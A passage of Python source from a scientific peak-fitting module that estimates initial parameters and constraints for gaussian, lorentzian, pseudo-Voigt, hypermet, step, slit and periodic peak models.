self.config = DEFAULT_CONFIG
else:
self.config = config
def ahypermet(self, x, *pars):
"""
Wrapping of :func:`silx.math.fit.functions.sum_ahypermet` without
the tail flags in the function signature.
Depending on the value of `self.config['HypermetTails']`, one can
activate or deactivate the various terms of the hypermet function.
`self.config['HypermetTails']` must be an integer between 0 and 15.
It is a set of 4 binary flags, one for activating each one of the
hypermet terms: *gaussian function, short tail, long tail, step*.
For example, 15 can be expressed as ``1111`` in base 2, so a flag of
15 means all terms are active.
"""
g_term = self.config['HypermetTails'] & 1
st_term = (self.config['HypermetTails'] >> 1) & 1
lt_term = (self.config['HypermetTails'] >> 2) & 1
step_term = (self.config['HypermetTails'] >> 3) & 1
return functions.sum_ahypermet(x, *pars,
gaussian_term=g_term, st_term=st_term,
lt_term=lt_term, step_term=step_term)
def poly(self, x, *pars):
"""Order n polynomial.
The order of the polynomial is defined by the number of
coefficients (``*pars``).
"""
p = numpy.poly1d(pars)
return p(x)
@staticmethod
def estimate_poly(x, y, n=2):
"""Estimate polynomial coefficients for a degree n polynomial.
"""
pcoeffs = numpy.polyfit(x, y, n)
constraints = numpy.zeros((n + 1, 3), numpy.float)
return pcoeffs, constraints
def estimate_quadratic(self, x, y):
"""Estimate quadratic coefficients
"""
return self.estimate_poly(x, y, n=2)
def estimate_cubic(self, x, y):
"""Estimate coefficients for a degree 3 polynomial
"""
return self.estimate_poly(x, y, n=3)
def estimate_quartic(self, x, y):
"""Estimate coefficients for a degree 4 polynomial
"""
return self.estimate_poly(x, y, n=4)
def estimate_quintic(self, x, y):
"""Estimate coefficients for a degree 5 polynomial
"""
return self.estimate_poly(x, y, n=5)
def strip_bg(self, y):
"""Return the strip background of y, using parameters from
:attr:`config` dictionary (*StripBackgroundFlag, StripWidth,
StripIterations, StripThresholdFactor*)"""
remove_strip_bg = self.config.get('StripBackgroundFlag', False)
if remove_strip_bg:
if self.config['SmoothingFlag']:
y = savitsky_golay(y, self.config['SmoothingWidth'])
strip_width = self.config['StripWidth']
strip_niterations = self.config['StripIterations']
strip_thr_factor = self.config['StripThresholdFactor']
return strip(y, w=strip_width,
niterations=strip_niterations,
factor=strip_thr_factor)
else:
return numpy.zeros_like(y)
def guess_yscaling(self, y):
"""Estimate scaling for y prior to peak search.
A smoothing filter is applied to y to estimate the noise level
(chi-squared)
:param y: Data array
:return: Scaling factor
"""
# ensure y is an array
yy = numpy.array(y, copy=False)
# smooth
convolution_kernel = numpy.ones(shape=(3,)) / 3.
ysmooth = numpy.convolve(y, convolution_kernel, mode="same")
# remove zeros
idx_array = numpy.fabs(y) > 0.0
yy = yy[idx_array]
ysmooth = ysmooth[idx_array]
# compute scaling factor
chisq = numpy.mean((yy - ysmooth)**2 / numpy.fabs(yy))
if chisq > 0:
return 1. / chisq
else:
return 1.0
def peak_search(self, y, fwhm, sensitivity):
"""Search for peaks in y array, after padding the array and
multiplying its value by a scaling factor.
:param y: 1-D data array
:param int fwhm: Typical full width at half maximum for peaks,
in number of points. This parameter is used for to discriminate between
true peaks and background fluctuations.
:param float sensitivity: Sensitivity parameter. This is a threshold factor
for peak detection. Only peaks larger than the standard deviation
of the noise multiplied by this sensitivity parameter are detected.
:return: List of peak indices
"""
# add padding
ysearch = numpy.ones((len(y) + 2 * fwhm,), numpy.float)
ysearch[0:fwhm] = y[0]
ysearch[-1:-fwhm - 1:-1] = y[len(y)-1]
ysearch[fwhm:fwhm + len(y)] = y[:]
scaling = self.guess_yscaling(y) if self.config["AutoScaling"] else self.config["Yscaling"]
if len(ysearch) > 1.5 * fwhm:
peaks = peak_search(scaling * ysearch,
fwhm=fwhm, sensitivity=sensitivity)
return [peak_index - fwhm for peak_index in peaks
if 0 <= peak_index - fwhm < len(y)]
else:
return []
def estimate_height_position_fwhm(self, x, y):
"""Estimation of *Height, Position, FWHM* of peaks, for gaussian-like
curves.
This functions finds how many parameters are needed, based on the
number of peaks detected. Then it estimates the fit parameters
with a few iterations of fitting gaussian functions.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Height, Position, FWHM*.
Fit constraints depend on :attr:`config`.
"""
fittedpar = []
bg = self.strip_bg(y)
if self.config['AutoFwhm']:
search_fwhm = guess_fwhm(y)
else:
search_fwhm = int(float(self.config['FwhmPoints']))
search_sens = float(self.config['Sensitivity'])
if search_fwhm < 3:
_logger.warning("Setting peak fwhm to 3 (lower limit)")
search_fwhm = 3
self.config['FwhmPoints'] = 3
if search_sens < 1:
_logger.warning("Setting peak search sensitivity to 1. " +
"(lower limit to filter out noise peaks)")
search_sens = 1
self.config['Sensitivity'] = 1
npoints = len(y)
# Find indices of peaks in data array
peaks = self.peak_search(y,
fwhm=search_fwhm,
sensitivity=search_sens)
if not len(peaks):
forcepeak = int(float(self.config.get('ForcePeakPresence', 0)))
if forcepeak:
delta = y - bg
# get index of global maximum
# (first one if several samples are equal to this value)
peaks = [numpy.nonzero(delta == delta.max())[0][0]]
# Find index of largest peak in peaks array
index_largest_peak = 0
if len(peaks) > 0:
# estimate fwhm as 5 * sampling interval
sig = 5 * abs(x[npoints - 1] - x[0]) / npoints
peakpos = x[int(peaks[0])]
if abs(peakpos) < 1.0e-16:
peakpos = 0.0
param = numpy.array(
[y[int(peaks[0])] - bg[int(peaks[0])], peakpos, sig])
height_largest_peak = param[0]
peak_index = 1
for i in peaks[1:]:
param2 = numpy.array(
[y[int(i)] - bg[int(i)], x[int(i)], sig])
param = numpy.concatenate((param, param2))
if param2[0] > height_largest_peak:
height_largest_peak = param2[0]
index_largest_peak = peak_index
peak_index += 1
# Subtract background
xw = x
yw = y - bg
cons = numpy.zeros((len(param), 3), numpy.float)
# peak height must be positive
cons[0:len(param):3, 0] = CPOSITIVE
# force peaks to stay around their position
cons[1:len(param):3, 0] = CQUOTED
# set possible peak range to estimated peak +- guessed fwhm
if len(xw) > search_fwhm:
fwhmx = numpy.fabs(xw[int(search_fwhm)] - xw[0])
cons[1:len(param):3, 1] = param[1:len(param):3] - 0.5 * fwhmx
cons[1:len(param):3, 2] = param[1:len(param):3] + 0.5 * fwhmx
else:
shape = [max(1, int(x)) for x in (param[1:len(param):3])]
cons[1:len(param):3, 1] = min(xw) * numpy.ones(
shape,
numpy.float)
cons[1:len(param):3, 2] = max(xw) * numpy.ones(
shape,
numpy.float)
# ensure fwhm is positive
cons[2:len(param):3, 0] = CPOSITIVE
# run a quick iterative fit (4 iterations) to improve
# estimations
fittedpar, _, _ = leastsq(functions.sum_gauss, xw, yw, param,
max_iter=4, constraints=cons.tolist(),
full_output=True)
# set final constraints based on config parameters
cons = numpy.zeros((len(fittedpar), 3), numpy.float)
peak_index = 0
for i in range(len(peaks)):
# Setup height area constrains
if not self.config['NoConstraintsFlag']:
if self.config['PositiveHeightAreaFlag']:
cons[peak_index, 0] = CPOSITIVE
cons[peak_index, 1] = 0
cons[peak_index, 2] = 0
peak_index += 1
# Setup position constrains
if not self.config['NoConstraintsFlag']:
if self.config['QuotedPositionFlag']:
cons[peak_index, 0] = CQUOTED
cons[peak_index, 1] = min(x)
cons[peak_index, 2] = max(x)
peak_index += 1
# Setup positive FWHM constrains
if not self.config['NoConstraintsFlag']:
if self.config['PositiveFwhmFlag']:
cons[peak_index, 0] = CPOSITIVE
cons[peak_index, 1] = 0
cons[peak_index, 2] = 0
if self.config['SameFwhmFlag']:
if i != index_largest_peak:
cons[peak_index, 0] = CFACTOR
cons[peak_index, 1] = 3 * index_largest_peak + 2
cons[peak_index, 2] = 1.0
peak_index += 1
return fittedpar, cons
def estimate_agauss(self, x, y):
"""Estimation of *Area, Position, FWHM* of peaks, for gaussian-like
curves.
This functions uses :meth:`estimate_height_position_fwhm`, then
converts the height parameters to area under the curve with the
formula ``area = sqrt(2*pi) * height * fwhm / (2 * sqrt(2 * log(2))``
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Area, Position, FWHM*.
Fit constraints depend on :attr:`config`.
"""
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
# get the number of found peaks
npeaks = len(fittedpar) // 3
for i in range(npeaks):
height = fittedpar[3 * i]
fwhm = fittedpar[3 * i + 2]
# Replace height with area in fittedpar
fittedpar[3 * i] = numpy.sqrt(2 * numpy.pi) * height * fwhm / (
2.0 * numpy.sqrt(2 * numpy.log(2)))
return fittedpar, cons
def estimate_alorentz(self, x, y):
"""Estimation of *Area, Position, FWHM* of peaks, for Lorentzian
curves.
This functions uses :meth:`estimate_height_position_fwhm`, then
converts the height parameters to area under the curve with the
formula ``area = height * fwhm * 0.5 * pi``
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Area, Position, FWHM*.
Fit constraints depend on :attr:`config`.
"""
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
# get the number of found peaks
npeaks = len(fittedpar) // 3
for i in range(npeaks):
height = fittedpar[3 * i]
fwhm = fittedpar[3 * i + 2]
# Replace height with area in fittedpar
fittedpar[3 * i] = (height * fwhm * 0.5 * numpy.pi)
return fittedpar, cons
def estimate_splitgauss(self, x, y):
"""Estimation of *Height, Position, FWHM1, FWHM2* of peaks, for
asymmetric gaussian-like curves.
This functions uses :meth:`estimate_height_position_fwhm`, then
adds a second (identical) estimation of FWHM to the fit parameters
for each peak, and the corresponding constraint.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Height, Position, FWHM1, FWHM2*.
Fit constraints depend on :attr:`config`.
"""
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
# get the number of found peaks
npeaks = len(fittedpar) // 3
estimated_parameters = []
estimated_constraints = numpy.zeros((4 * npeaks, 3), numpy.float)
for i in range(npeaks):
for j in range(3):
estimated_parameters.append(fittedpar[3 * i + j])
# fwhm2 estimate = fwhm1
estimated_parameters.append(fittedpar[3 * i + 2])
# height
estimated_constraints[4 * i, 0] = cons[3 * i, 0]
estimated_constraints[4 * i, 1] = cons[3 * i, 1]
estimated_constraints[4 * i, 2] = cons[3 * i, 2]
# position
estimated_constraints[4 * i + 1, 0] = cons[3 * i + 1, 0]
estimated_constraints[4 * i + 1, 1] = cons[3 * i + 1, 1]
estimated_constraints[4 * i + 1, 2] = cons[3 * i + 1, 2]
# fwhm1
estimated_constraints[4 * i + 2, 0] = cons[3 * i + 2, 0]
estimated_constraints[4 * i + 2, 1] = cons[3 * i + 2, 1]
estimated_constraints[4 * i + 2, 2] = cons[3 * i + 2, 2]
# fwhm2
estimated_constraints[4 * i + 3, 0] = cons[3 * i + 2, 0]
estimated_constraints[4 * i + 3, 1] = cons[3 * i + 2, 1]
estimated_constraints[4 * i + 3, 2] = cons[3 * i + 2, 2]
if cons[3 * i + 2, 0] == CFACTOR:
# convert indices of related parameters
# (this happens if SameFwhmFlag == True)
estimated_constraints[4 * i + 2, 1] = \
int(cons[3 * i + 2, 1] / 3) * 4 + 2
estimated_constraints[4 * i + 3, 1] = \
int(cons[3 * i + 2, 1] / 3) * 4 + 3
return estimated_parameters, estimated_constraints
def estimate_pvoigt(self, x, y):
"""Estimation of *Height, Position, FWHM, eta* of peaks, for
pseudo-Voigt curves.
Pseudo-Voigt are a sum of a gaussian curve *G(x)* and a lorentzian
curve *L(x)* with the same height, center, fwhm parameters:
``y(x) = eta * G(x) + (1-eta) * L(x)``
This functions uses :meth:`estimate_height_position_fwhm`, then
adds a constant estimation of *eta* (0.5) to the fit parameters
for each peak, and the corresponding constraint.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Height, Position, FWHM, eta*.
Constraint for the eta parameter can be set to QUOTED (0.--1.)
by setting :attr:`config`['QuotedEtaFlag'] to ``True``.
If this is not the case, the constraint code is set to FREE.
"""
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
npeaks = len(fittedpar) // 3
newpar = []
newcons = numpy.zeros((4 * npeaks, 3), numpy.float)
# find out related parameters proper index
if not self.config['NoConstraintsFlag']:
if self.config['SameFwhmFlag']:
j = 0
# get the index of the free FWHM
for i in range(npeaks):
if cons[3 * i + 2, 0] != 4:
j = i
for i in range(npeaks):
if i != j:
cons[3 * i + 2, 1] = 4 * j + 2
for i in range(npeaks):
newpar.append(fittedpar[3 * i])
newpar.append(fittedpar[3 * i + 1])
newpar.append(fittedpar[3 * i + 2])
newpar.append(0.5)
# height
newcons[4 * i, 0] = cons[3 * i, 0]
newcons[4 * i, 1] = cons[3 * i, 1]
newcons[4 * i, 2] = cons[3 * i, 2]
# position
newcons[4 * i + 1, 0] = cons[3 * i + 1, 0]
newcons[4 * i + 1, 1] = cons[3 * i + 1, 1]
newcons[4 * i + 1, 2] = cons[3 * i + 1, 2]
# fwhm
newcons[4 * i + 2, 0] = cons[3 * i + 2, 0]
newcons[4 * i + 2, 1] = cons[3 * i + 2, 1]
newcons[4 * i + 2, 2] = cons[3 * i + 2, 2]
# Eta constrains
newcons[4 * i + 3, 0] = CFREE
newcons[4 * i + 3, 1] = 0
newcons[4 * i + 3, 2] = 0
if self.config['QuotedEtaFlag']:
newcons[4 * i + 3, 0] = CQUOTED
newcons[4 * i + 3, 1] = 0.0
newcons[4 * i + 3, 2] = 1.0
return newpar, newcons
def estimate_splitpvoigt(self, x, y):
"""Estimation of *Height, Position, FWHM1, FWHM2, eta* of peaks, for
asymmetric pseudo-Voigt curves.
This functions uses :meth:`estimate_height_position_fwhm`, then
adds an identical FWHM2 parameter and a constant estimation of
*eta* (0.5) to the fit parameters for each peak, and the corresponding
constraints.
Constraint for the eta parameter can be set to QUOTED (0.--1.)
by setting :attr:`config`['QuotedEtaFlag'] to ``True``.
If this is not the case, the constraint code is set to FREE.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Height, Position, FWHM1, FWHM2, eta*.
"""
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
npeaks = len(fittedpar) // 3
newpar = []
newcons = numpy.zeros((5 * npeaks, 3), numpy.float)
# find out related parameters proper index
if not self.config['NoConstraintsFlag']:
if self.config['SameFwhmFlag']:
j = 0
# get the index of the free FWHM
for i in range(npeaks):
if cons[3 * i + 2, 0] != 4:
j = i
for i in range(npeaks):
if i != j:
cons[3 * i + 2, 1] = 4 * j + 2
for i in range(npeaks):
# height
newpar.append(fittedpar[3 * i])
# position
newpar.append(fittedpar[3 * i + 1])
# fwhm1
newpar.append(fittedpar[3 * i + 2])
# fwhm2 estimate equal to fwhm1
newpar.append(fittedpar[3 * i + 2])
# eta
newpar.append(0.5)
# constraint codes
# ----------------
# height
newcons[5 * i, 0] = cons[3 * i, 0]
# position
newcons[5 * i + 1, 0] = cons[3 * i + 1, 0]
# fwhm1
newcons[5 * i + 2, 0] = cons[3 * i + 2, 0]
# fwhm2
newcons[5 * i + 3, 0] = cons[3 * i + 2, 0]
# cons 1
# ------
newcons[5 * i, 1] = cons[3 * i, 1]
newcons[5 * i + 1, 1] = cons[3 * i + 1, 1]
newcons[5 * i + 2, 1] = cons[3 * i + 2, 1]
newcons[5 * i + 3, 1] = cons[3 * i + 2, 1]
# cons 2
# ------
newcons[5 * i, 2] = cons[3 * i, 2]
newcons[5 * i + 1, 2] = cons[3 * i + 1, 2]
newcons[5 * i + 2, 2] = cons[3 * i + 2, 2]
newcons[5 * i + 3, 2] = cons[3 * i + 2, 2]
if cons[3 * i + 2, 0] == CFACTOR:
# fwhm2 connstraint depends on fwhm1
newcons[5 * i + 3, 1] = newcons[5 * i + 2, 1] + 1
# eta constraints
newcons[5 * i + 4, 0] = CFREE
newcons[5 * i + 4, 1] = 0
newcons[5 * i + 4, 2] = 0
if self.config['QuotedEtaFlag']:
newcons[5 * i + 4, 0] = CQUOTED
newcons[5 * i + 4, 1] = 0.0
newcons[5 * i + 4, 2] = 1.0
return newpar, newcons
def estimate_apvoigt(self, x, y):
"""Estimation of *Area, Position, FWHM1, eta* of peaks, for
pseudo-Voigt curves.
This functions uses :meth:`estimate_pvoigt`, then converts the height
parameter to area.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*Area, Position, FWHM, eta*.
"""
fittedpar, cons = self.estimate_pvoigt(x, y)
npeaks = len(fittedpar) // 4
# Assume 50% of the area is determined by the gaussian and 50% by
# the Lorentzian.
for i in range(npeaks):
height = fittedpar[4 * i]
fwhm = fittedpar[4 * i + 2]
fittedpar[4 * i] = 0.5 * (height * fwhm * 0.5 * numpy.pi) +\
0.5 * (height * fwhm / (2.0 * numpy.sqrt(2 * numpy.log(2)))
) * numpy.sqrt(2 * numpy.pi)
return fittedpar, cons
def estimate_ahypermet(self, x, y):
"""Estimation of *area, position, fwhm, st_area_r, st_slope_r,
lt_area_r, lt_slope_r, step_height_r* of peaks, for hypermet curves.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each peak are:
*area, position, fwhm, st_area_r, st_slope_r,
lt_area_r, lt_slope_r, step_height_r* .
"""
yscaling = self.config.get('Yscaling', 1.0)
if yscaling == 0:
yscaling = 1.0
fittedpar, cons = self.estimate_height_position_fwhm(x, y)
npeaks = len(fittedpar) // 3
newpar = []
newcons = numpy.zeros((8 * npeaks, 3), numpy.float)
main_peak = 0
# find out related parameters proper index
if not self.config['NoConstraintsFlag']:
if self.config['SameFwhmFlag']:
j = 0
# get the index of the free FWHM
for i in range(npeaks):
if cons[3 * i + 2, 0] != 4:
j = i
for i in range(npeaks):
if i != j:
cons[3 * i + 2, 1] = 8 * j + 2
main_peak = j
for i in range(npeaks):
if fittedpar[3 * i] > fittedpar[3 * main_peak]:
main_peak = i
for i in range(npeaks):
height = fittedpar[3 * i]
position = fittedpar[3 * i + 1]
fwhm = fittedpar[3 * i + 2]
area = (height * fwhm / (2.0 * numpy.sqrt(2 * numpy.log(2)))
) * numpy.sqrt(2 * numpy.pi)
# the gaussian parameters
newpar.append(area)
newpar.append(position)
newpar.append(fwhm)
# print "area, pos , fwhm = ",area,position,fwhm
# Avoid zero derivatives because of not calculating contribution
g_term = 1
st_term = 1
lt_term = 1
step_term = 1
if self.config['HypermetTails'] != 0:
g_term = self.config['HypermetTails'] & 1
st_term = (self.config['HypermetTails'] >> 1) & 1
lt_term = (self.config['HypermetTails'] >> 2) & 1
step_term = (self.config['HypermetTails'] >> 3) & 1
if g_term == 0:
# fix the gaussian parameters
newcons[8 * i, 0] = CFIXED
newcons[8 * i + 1, 0] = CFIXED
newcons[8 * i + 2, 0] = CFIXED
# the short tail parameters
if ((area * yscaling) <
self.config['MinGaussArea4ShortTail']) | \
(st_term == 0):
newpar.append(0.0)
newpar.append(0.0)
newcons[8 * i + 3, 0] = CFIXED
newcons[8 * i + 3, 1] = 0.0
newcons[8 * i + 3, 2] = 0.0
newcons[8 * i + 4, 0] = CFIXED
newcons[8 * i + 4, 1] = 0.0
newcons[8 * i + 4, 2] = 0.0
else:
newpar.append(self.config['InitialShortTailAreaRatio'])
newpar.append(self.config['InitialShortTailSlopeRatio'])
newcons[8 * i + 3, 0] = CQUOTED
newcons[8 * i + 3, 1] = self.config['MinShortTailAreaRatio']
newcons[8 * i + 3, 2] = self.config['MaxShortTailAreaRatio']
newcons[8 * i + 4, 0] = CQUOTED
newcons[8 * i + 4, 1] = self.config['MinShortTailSlopeRatio']
newcons[8 * i + 4, 2] = self.config['MaxShortTailSlopeRatio']
# the long tail parameters
if ((area * yscaling) <
self.config['MinGaussArea4LongTail']) | \
(lt_term == 0):
newpar.append(0.0)
newpar.append(0.0)
newcons[8 * i + 5, 0] = CFIXED
newcons[8 * i + 5, 1] = 0.0
newcons[8 * i + 5, 2] = 0.0
newcons[8 * i + 6, 0] = CFIXED
newcons[8 * i + 6, 1] = 0.0
newcons[8 * i + 6, 2] = 0.0
else:
newpar.append(self.config['InitialLongTailAreaRatio'])
newpar.append(self.config['InitialLongTailSlopeRatio'])
newcons[8 * i + 5, 0] = CQUOTED
newcons[8 * i + 5, 1] = self.config['MinLongTailAreaRatio']
newcons[8 * i + 5, 2] = self.config['MaxLongTailAreaRatio']
newcons[8 * i + 6, 0] = CQUOTED
newcons[8 * i + 6, 1] = self.config['MinLongTailSlopeRatio']
newcons[8 * i + 6, 2] = self.config['MaxLongTailSlopeRatio']
# the step parameters
if ((height * yscaling) <
self.config['MinGaussHeight4StepTail']) | \
(step_term == 0):
newpar.append(0.0)
newcons[8 * i + 7, 0] = CFIXED
newcons[8 * i + 7, 1] = 0.0
newcons[8 * i + 7, 2] = 0.0
else:
newpar.append(self.config['InitialStepTailHeightRatio'])
newcons[8 * i + 7, 0] = CQUOTED
newcons[8 * i + 7, 1] = self.config['MinStepTailHeightRatio']
newcons[8 * i + 7, 2] = self.config['MaxStepTailHeightRatio']
# if self.config['NoConstraintsFlag'] == 1:
# newcons=numpy.zeros((8*npeaks, 3),numpy.float)
if npeaks > 0:
if g_term:
if self.config['PositiveHeightAreaFlag']:
for i in range(npeaks):
newcons[8 * i, 0] = CPOSITIVE
if self.config['PositiveFwhmFlag']:
for i in range(npeaks):
newcons[8 * i + 2, 0] = CPOSITIVE
if self.config['SameFwhmFlag']:
for i in range(npeaks):
if i != main_peak:
newcons[8 * i + 2, 0] = CFACTOR
newcons[8 * i + 2, 1] = 8 * main_peak + 2
newcons[8 * i + 2, 2] = 1.0
if self.config['HypermetQuotedPositionFlag']:
for i in range(npeaks):
delta = self.config['DeltaPositionFwhmUnits'] * fwhm
newcons[8 * i + 1, 0] = CQUOTED
newcons[8 * i + 1, 1] = newpar[8 * i + 1] - delta
newcons[8 * i + 1, 2] = newpar[8 * i + 1] + delta
if self.config['SameSlopeRatioFlag']:
for i in range(npeaks):
if i != main_peak:
newcons[8 * i + 4, 0] = CFACTOR
newcons[8 * i + 4, 1] = 8 * main_peak + 4
newcons[8 * i + 4, 2] = 1.0
newcons[8 * i + 6, 0] = CFACTOR
newcons[8 * i + 6, 1] = 8 * main_peak + 6
newcons[8 * i + 6, 2] = 1.0
if self.config['SameAreaRatioFlag']:
for i in range(npeaks):
if i != main_peak:
newcons[8 * i + 3, 0] = CFACTOR
newcons[8 * i + 3, 1] = 8 * main_peak + 3
newcons[8 * i + 3, 2] = 1.0
newcons[8 * i + 5, 0] = CFACTOR
newcons[8 * i + 5, 1] = 8 * main_peak + 5
newcons[8 * i + 5, 2] = 1.0
return newpar, newcons
def estimate_stepdown(self, x, y):
"""Estimation of parameters for stepdown curves.
The functions estimates gaussian parameters for the derivative of
the data, takes the largest gaussian peak and uses its estimated
parameters to define the center of the step and its fwhm. The
estimated amplitude returned is simply ``max(y) - min(y)``.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit newconstraints.
Parameters to be estimated for each stepdown are:
*height, centroid, fwhm* .
"""
crappyfilter = [-0.25, -0.75, 0.0, 0.75, 0.25]
cutoff = len(crappyfilter) // 2
y_deriv = numpy.convolve(y,
crappyfilter,
mode="valid")
# make the derivative's peak have the same amplitude as the step
if max(y_deriv) > 0:
y_deriv = y_deriv * max(y) / max(y_deriv)
fittedpar, newcons = self.estimate_height_position_fwhm(
x[cutoff:-cutoff], y_deriv)
data_amplitude = max(y) - min(y)
# use parameters from largest gaussian found
if len(fittedpar):
npeaks = len(fittedpar) // 3
largest_index = 0
largest = [data_amplitude,
fittedpar[3 * largest_index + 1],
fittedpar[3 * largest_index + 2]]
for i in range(npeaks):
if fittedpar[3 * i] > largest[0]:
largest_index = i
largest = [data_amplitude,
fittedpar[3 * largest_index + 1],
fittedpar[3 * largest_index + 2]]
else:
# no peak was found
largest = [data_amplitude, # height
x[len(x)//2], # center: middle of x range
self.config["FwhmPoints"] * (x[1] - x[0])] # fwhm: default value
# Setup constrains
newcons = numpy.zeros((3, 3), numpy.float)
if not self.config['NoConstraintsFlag']:
# Setup height constrains
if self.config['PositiveHeightAreaFlag']:
newcons[0, 0] = CPOSITIVE
newcons[0, 1] = 0
newcons[0, 2] = 0
# Setup position constrains
if self.config['QuotedPositionFlag']:
newcons[1, 0] = CQUOTED
newcons[1, 1] = min(x)
newcons[1, 2] = max(x)
# Setup positive FWHM constrains
if self.config['PositiveFwhmFlag']:
newcons[2, 0] = CPOSITIVE
newcons[2, 1] = 0
newcons[2, 2] = 0
return largest, newcons
def estimate_slit(self, x, y):
"""Estimation of parameters for slit curves.
The functions estimates stepup and stepdown parameters for the largest
steps, and uses them for calculating the center (middle between stepup
and stepdown), the height (maximum amplitude in data), the fwhm
(distance between the up- and down-step centers) and the beamfwhm
(average of FWHM for up- and down-step).
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each slit are:
*height, position, fwhm, beamfwhm* .
"""
largestup, cons = self.estimate_stepup(x, y)
largestdown, cons = self.estimate_stepdown(x, y)
fwhm = numpy.fabs(largestdown[1] - largestup[1])
beamfwhm = 0.5 * (largestup[2] + largestdown[1])
beamfwhm = min(beamfwhm, fwhm / 10.0)
beamfwhm = max(beamfwhm, (max(x) - min(x)) * 3.0 / len(x))
y_minus_bg = y - self.strip_bg(y)
height = max(y_minus_bg)
i1 = numpy.nonzero(y_minus_bg >= 0.5 * height)[0]
xx = numpy.take(x, i1)
position = (xx[0] + xx[-1]) / 2.0
fwhm = xx[-1] - xx[0]
largest = [height, position, fwhm, beamfwhm]
cons = numpy.zeros((4, 3), numpy.float)
# Setup constrains
if not self.config['NoConstraintsFlag']:
# Setup height constrains
if self.config['PositiveHeightAreaFlag']:
cons[0, 0] = CPOSITIVE
cons[0, 1] = 0
cons[0, 2] = 0
# Setup position constrains
if self.config['QuotedPositionFlag']:
cons[1, 0] = CQUOTED
cons[1, 1] = min(x)
cons[1, 2] = max(x)
# Setup positive FWHM constrains
if self.config['PositiveFwhmFlag']:
cons[2, 0] = CPOSITIVE
cons[2, 1] = 0
cons[2, 2] = 0
# Setup positive FWHM constrains
if self.config['PositiveFwhmFlag']:
cons[3, 0] = CPOSITIVE
cons[3, 1] = 0
cons[3, 2] = 0
return largest, cons
def estimate_stepup(self, x, y):
"""Estimation of parameters for a single step up curve.
The functions estimates gaussian parameters for the derivative of
the data, takes the largest gaussian peak and uses its estimated
parameters to define the center of the step and its fwhm. The
estimated amplitude returned is simply ``max(y) - min(y)``.
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
Parameters to be estimated for each stepup are:
*height, centroid, fwhm* .
"""
crappyfilter = [0.25, 0.75, 0.0, -0.75, -0.25]
cutoff = len(crappyfilter) // 2
y_deriv = numpy.convolve(y, crappyfilter, mode="valid")
if max(y_deriv) > 0:
y_deriv = y_deriv * max(y) / max(y_deriv)
fittedpar, cons = self.estimate_height_position_fwhm(
x[cutoff:-cutoff], y_deriv)
# for height, use the data amplitude after removing the background
data_amplitude = max(y) - min(y)
# find params of the largest gaussian found
if len(fittedpar):
npeaks = len(fittedpar) // 3
largest_index = 0
largest = [data_amplitude,
fittedpar[3 * largest_index + 1],
fittedpar[3 * largest_index + 2]]
for i in range(npeaks):
if fittedpar[3 * i] > largest[0]:
largest_index = i
largest = [fittedpar[3 * largest_index],
fittedpar[3 * largest_index + 1],
fittedpar[3 * largest_index + 2]]
else:
# no peak was found
largest = [data_amplitude, # height
x[len(x)//2], # center: middle of x range
self.config["FwhmPoints"] * (x[1] - x[0])] # fwhm: default value
newcons = numpy.zeros((3, 3), numpy.float)
# Setup constrains
if not self.config['NoConstraintsFlag']:
# Setup height constraints
if self.config['PositiveHeightAreaFlag']:
newcons[0, 0] = CPOSITIVE
newcons[0, 1] = 0
newcons[0, 2] = 0
# Setup position constraints
if self.config['QuotedPositionFlag']:
newcons[1, 0] = CQUOTED
newcons[1, 1] = min(x)
newcons[1, 2] = max(x)
# Setup positive FWHM constraints
if self.config['PositiveFwhmFlag']:
newcons[2, 0] = CPOSITIVE
newcons[2, 1] = 0
newcons[2, 2] = 0
return largest, newcons
def estimate_periodic_gauss(self, x, y):
"""Estimation of parameters for periodic gaussian curves:
*number of peaks, distance between peaks, height, position of the
first peak, fwhm*
The functions detects all peaks, then computes the parameters the
following way:
- *distance*: average of distances between detected peaks
- *height*: average height of detected peaks
- *fwhm*: fwhm of the highest peak (in number of samples) if
field ``'AutoFwhm'`` in :attr:`config` is ``True``, else take
the default value (field ``'FwhmPoints'`` in :attr:`config`)
:param x: Array of abscissa values
:param y: Array of ordinate values (``y = f(x)``)
:return: Tuple of estimated fit parameters and fit constraints.
"""
yscaling = self.config.get('Yscaling', 1.0)
if yscaling == 0:
yscaling = 1.0
bg = self.strip_bg(y)
if self.config['AutoFwhm']:
search_fwhm = guess_fwhm(y)
else:
search_fwhm = int(float(self.config['FwhmPoints']))
search_sens = float(self.config['Sensitivity'])
if search_fwhm < 3:
search_fwhm = 3
if search_sens < 1:
search_sens = 1
if len(y) > 1.5 * search_fwhm:
peaks = peak_search(yscaling * y, fwhm=search_fwhm,
sensitivity=search_sens)
else:
peaks = []
npeaks = len(peaks)
if not npeaks:
fittedpar = []
cons = numpy.zeros((len(fittedpar), 3), numpy.float)
return fittedpar, cons
fittedpar = [0.0, 0.0, 0.0, 0.0, 0.0]
# The number of peaks
fittedpar[0] = npeaks
